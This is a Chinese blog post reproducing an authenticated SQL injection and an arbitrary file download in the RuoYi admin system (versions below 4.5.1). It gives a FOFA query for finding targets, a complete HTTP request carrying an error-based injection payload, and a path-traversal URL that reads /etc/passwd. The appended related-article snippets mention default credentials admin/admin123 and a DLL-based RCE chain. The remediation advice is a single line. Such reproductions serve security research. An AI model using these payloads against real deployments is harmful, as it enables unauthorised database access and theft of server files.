若依(Ruoyi)管理系统后台sql注入+任意文件下载漏洞

最新推荐文章于 2025-11-17 16:45:01 发布
原创 最新推荐文章于 2025-11-17 16:45:01 发布 · 9.4k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#若依(Ruoyi)管理系统 #后台sql注入 #任意文件下载漏洞

若依管理系统存在严重安全漏洞,包括SQL注入及任意文件下载,影响版本低于v4.5.1。攻击者可通过特定URL获取敏感信息。

0x00若依介绍

若依可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错概率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。
寓意:你若不离不弃,我必生死相依

0x01漏洞描述

若依管理系统是基于SpringBoot的权限管理系统,后台存在sql注入、任意文件下载漏洞,可以读取数据库、服务器上的任意文件内容。

0x02FOFA

app=”若依-管理系统”

0x03漏洞复现

SQL注入

这是个后台洞,所以需要进入到后台嘤嘤嘤

在这里插入图片描述
漏洞位置在”系统管理”里中的”角色管理中”
http://xxxxxxx/system/role/list
在这里插入图片描述

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

POST /system/role/list HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=dea10cdb-9d3c-4f6a-854a-ea1ca540a992
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

成功利用报错注入拿到数据数据库名称

在这里插入图片描述

任意文件下载

影响版本:RuoYi < v4.5.1

在这里插入图片描述

登录后台后直接访问以下url即可下载文件

http://xxx/common/download/resource?resource/profile/../../../../etc/passwd

在这里插入图片描述

0x04漏洞修复

更新升级到最新版本

转载请注明:Adminxe's Blog » 若依(Ruoyi)管理系统后台sql注入+任意文件下载漏洞

漏洞复现】若依系统后台SQL注入漏洞
晚风不及你
02-27 2392
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
RuoYi 若依后台管理系统存在SQL注入漏洞CVE-2023-49371
千寻的博客
03-05 1801
RuoYi是中国若依(RuoYi)个人开发者的一款后台管理系统。该漏洞源于通过/system/dept/edit存在SQL注入漏洞在系统管理–部门控制–进行修改,抓取数据包,在在status参数追加发现存在SQL注入漏洞
【代码审计】RuoYi-4.8.0 定时任务RCE 漏洞分析
最新发布
uuzeray的博客
11-17 492
如这段字符串也是符合规则的:evil.test.func("com.ruoyi.quartz.task.xxx")上传calc.dll,改文件名为com.ruoyi.quartz.task.png。首先需要上传个恶意dll或者so,本机环境是windows,故选用前者。走到最后是一段对白名单字符串的正则匹配,并不要求出现在字符串开头。找个文件上传点上传下calc.dll。这种拦截方式对于白名单检测显然欠妥。这个逻辑在V4.8.1里也没修(可以看到文件名是部分可控的。这里白名单的处理有问题。
漏洞复现】若依系统后台任意文件读取漏洞
晚风不及你
02-27 2526
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
CVE-2023-49371 RuoYi 若依后台管理系统存在SQL注入漏洞
qq_27536045的博客
12-14 4338
CVE-2023-49371|RuoYi 若依后台管理系统存在SQL注入漏洞漏洞复现)
从代码审计的角度分析 Ruoyi v4.7.6 的任意文件下载漏洞
新青年1号
05-26 4549
从代码审计的角度看 Ruoyi v4.7.6 任意文件下载漏洞
若依漏洞综合利用工具
lza20001103的博客
09-11 5660
若依漏洞综合利用工具
实战Src对ruoyi框架管理系统漏洞的复现
zkaqlaoniao的博客
12-18 1万+
在挖src的时候,搜搜有没有后台弱口令能进去的:发现一个弱口令进去后:【这个蓝色的草丛居然堪比算是ruoyi的指纹】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
若依 RuoYi4.6.0 代码审计
2401_88858891的博客
01-04 945
IDEA打开项目,等待自动加载,修改application-druid.yml配置文件:数据库名,账号密码,连接数据库,修改application.yml中的端口,避免与80端口冲突。此方法会接收一个SysRole类型的role值,并且将接受的role值以selectRoleList方法处理后返回给list,最后返回给http响应。authc为登录拦截器,需要登录认证才能访问。该处代码先接收resource的值,再将该值放入checkAllowDownload方法里面校验后,进入下载文件的代码调用。
漏洞复现-Ruoyi若依系列
aming小老弟
05-02 2万+
官方漏洞历史文档。
若依管理框架-漏洞复现
千寻的博客
11-10 2377
RuoYi 是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。
ruoyi漏洞poc汇总及其原理分析(源码分析)
问彡心的博客
05-25 1万+
汇总网上常见的若依漏洞poc,根据不同版本的参照对比,分析每个漏洞在不同版本中的代码表现形式,学习这些漏洞后台的代码是如何编写的以及如何进行修复的
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 5万+
漏洞影响范围RuoYi
若依框架漏洞(若依管理系统漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-04 9265
若依管理系统是基于SpringBoot的权限管理系统,若依框架漏洞推荐使用zhzy的vulmap工具查看。 1.早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令漏洞复现 祭出fofa大法,fofa语法如下 app="若依-管理系统" && body="admin" 利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap 利用poc执行任意命令 2后台登录若依管理系统后可以任意读取文件
若依任意文件下载(CVE-2023-27025)
qq_32445755的博客
05-10 1795
若依它就是一个开源项目,任何公司的各种大的项目必然需要一个后台权限管理系统,这是必然的,但是如果不想投入太多人力物力去开发,又恰好有现成且比较好用的别人已经完成的项目直接供我们来使用。1、使用、减少工作量2、学习优秀的开源项目底层的编程思想,设计思路,提高自己的编程能力。
洞态IAST检测RuoYisql注入漏洞
weixin_40418457的博客
07-27 2119
一、背景 因为看到 Xcheck 发的自动检测到开源项目 RuoYisql 注入漏洞,因此打算用该漏洞验证一下洞态 IAST 的漏洞检测能力。洞态 IAST 的检测方式是扫描运行中的应用程序,将扫描到的漏洞信息发送到云端进行处理、展示。 二、验证方式 本次验证选择在本地 IDEA 运行 Xcheck 测试的 RuoYi 版本(4.6.1),使用洞态 IAST 的 IDEA 插件对其进行快速检测。 三、本地环境搭建 克隆 RuoYi 源码 $ git clone https://github.com/
若依管理系统漏洞利用
qq_40461312的博客
09-27 1万+
若依(RuoYi)管理系统 后台任意文件读取,SQL注入 一、若依管理系统简介 基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用 二、若依管理系统后台任意文件下载漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码 fofa搜索语句:app=”若依-管理系统” 账号:admin 密码:admin123 登陆成功后直接访问 http://目标网站url/common/dow..
若依管理系统后台sql注入漏洞分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-23 2556
本文以RuoYi为例学习并整理了基于Mybatis框架的sql注入原理和场景,为高效快速挖掘基于Mybatis框架的sql注入提供一种思路和参考。若依管理系统是基于SpringBoot框架开发的,并利用MyBatis框架进行数据库操作。在RuoYi
若依(RuoYi)框架漏洞总结
m0_63017297的博客
09-19 2047
若依(RuoYi)框架漏洞总结
若依RuoYi后台管理系统源码下载与功能解析
RuoYi 是一个基于 Java 技术栈开发的开源后台管理框架,广泛适用于各类 Web 应用系统的快速构建,尤其在 OA(办公自动化)系统、CRM(客户关系管理)、CMS(内容管理系统)以及企业级管理平台中表现出色。...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值